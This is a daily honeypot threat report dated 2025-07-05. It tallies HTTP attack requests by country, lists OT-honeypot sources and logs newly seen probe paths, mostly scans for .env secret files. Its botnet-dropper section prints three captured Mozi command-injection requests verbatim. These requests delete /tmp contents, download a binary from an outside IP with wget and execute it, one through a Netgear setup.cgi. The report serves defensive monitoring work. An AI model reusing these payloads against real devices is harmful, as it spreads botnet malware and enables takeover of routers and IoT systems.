Daily Report: 2025-07-05#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 37 new requests that have never been observed before (these were added to the monitored request database.).
A total of 4250 requests were recorded during the day, originating from 3 different countries, with a peak of 2706 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
DE | Germany |
SG | Germany |
US | Germany |
US | Germany |
US | Dubai |
FR | Georgia |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
103.173.211.237 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.173.211.237:40935/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
120.86.254.114 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
112.198.186.249 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.198.186.249:58935/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
22 | 4 | GET /app/.env.key HTTP/1.1 |
23 | 4 | GET /awsconf/.env HTTP/1.1 |
30 | 3 | GET /ssl.php HTTP/1.1 |
420 | 1 | GET /0Mkt HTTP/1.1 |
426 | 1 | GET /nmaplowercheck1751727559 HTTP/1.1 |
433 | 1 | GET /NmapUpperCheck1751727559 HTTP/1.1 |
436 | 1 | GET /Nmap/folder/check1751727559 HTTP/1.1 |
1333 | 1 | GET /socket.io/1/?t=1751683036334 HTTP/1.1 |
1452 | 1 | GET /api/.env.uat HTTP/1.1 |
1473 | 1 | GET /.env-public HTTP/1.1 |
1474 | 1 | GET /.env-apache HTTP/1.1 |
1475 | 1 | GET /.env-logger HTTP/1.1 |
1476 | 1 | GET /.env-svelte HTTP/1.1 |
1477 | 1 | GET /.env-stripe HTTP/1.1 |
1504 | 1 | GET /app/.env.gcp HTTP/1.1 |
1525 | 1 | GET /sy.php HTTP/1.1 |
1526 | 1 | \x00\x0E\x08\xFB\xEF\xAE\x0B\xBAG\xCA\xE3\x00\x00\x00\x00\x00 |
1527 | 1 | \x00\x0E8\xFB\xEF\xAE\x0B\xBAG\xCA\xE3\x00\x00\x00\x00\x00 |
1529 | 1 | \x00\x0E\x08,&y\xBD\xA8RM\xCB\x00\x00\x00\x00\x00 |
1530 | 1 | \x00\x0E8,&y\xBD\xA8RM\xCB\x00\x00\x00\x00\x00 |
1533 | 1 | GET /.env.save.2 HTTP/1.1 |
1534 | 1 | GET /.env.render HTTP/1.1 |
1535 | 1 | GET /.env-branch HTTP/1.1 |
1536 | 1 | GET /.env.passwd HTTP/1.1 |
1537 | 1 | GET /.env-strapi HTTP/1.1 |
1538 | 1 | GET /.env-models HTTP/1.1 |
1539 | 1 | GET /.env-readme HTTP/1.1 |
1541 | 1 | GET /.env-ci.yml HTTP/1.1 |
1542 | 1 | GET /.env.newest HTTP/1.1 |
1543 | 1 | GET /.env-config HTTP/1.1 |
1544 | 1 | GET /.env-nextjs HTTP/1.1 |
1547 | 1 | GET /.env-nodejs HTTP/1.1 |
1548 | 1 | GET /.env-worker HTTP/1.1 |
1549 | 1 | GET /.env.latest HTTP/1.1 |
1550 | 1 | GET /.env-stdout HTTP/1.1 |
1551 | 1 | GET /.env-stderr HTTP/1.1 |
1552 | 1 | GET /.env-oauth2 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 2706 | GB |
1 | 849 | US |
2 | 190 | DE |
3 | 52 | IN |
4 | 49 | SE |
5 | 49 | VN |
6 | 47 | NL |
7 | 40 | FR |
8 | 35 | CA |
9 | 33 | BG |
10 | 27 | CN |
11 | 22 | AU |
12 | 16 | SC |
13 | 14 | JP |
14 | 12 | PL |
15 | 10 | RU |
16 | 9 | MU |
17 | 9 | BR |
18 | 9 | TW |
19 | 7 | BE |
20 | 7 | TR |
21 | 7 | ZA |
22 | 6 | IR |
23 | 6 | UA |
24 | 5 | SG |
25 | 5 | GH |
26 | 3 | KZ |
27 | 3 | HK |
28 | 3 | AO |
29 | 2 | EE |
30 | 2 | GR |
31 | 2 | GE |
32 | 2 | KW |
33 | 2 | LT |
34 | 2 | IE |
35 | 1 | AR |
36 | 1 | AT |
37 | 1 | MN |
38 | 1 | PT |
39 | 1 | SA |
40 | 1 | PH |
41 | 1 | CZ |
42 | 1 | NG |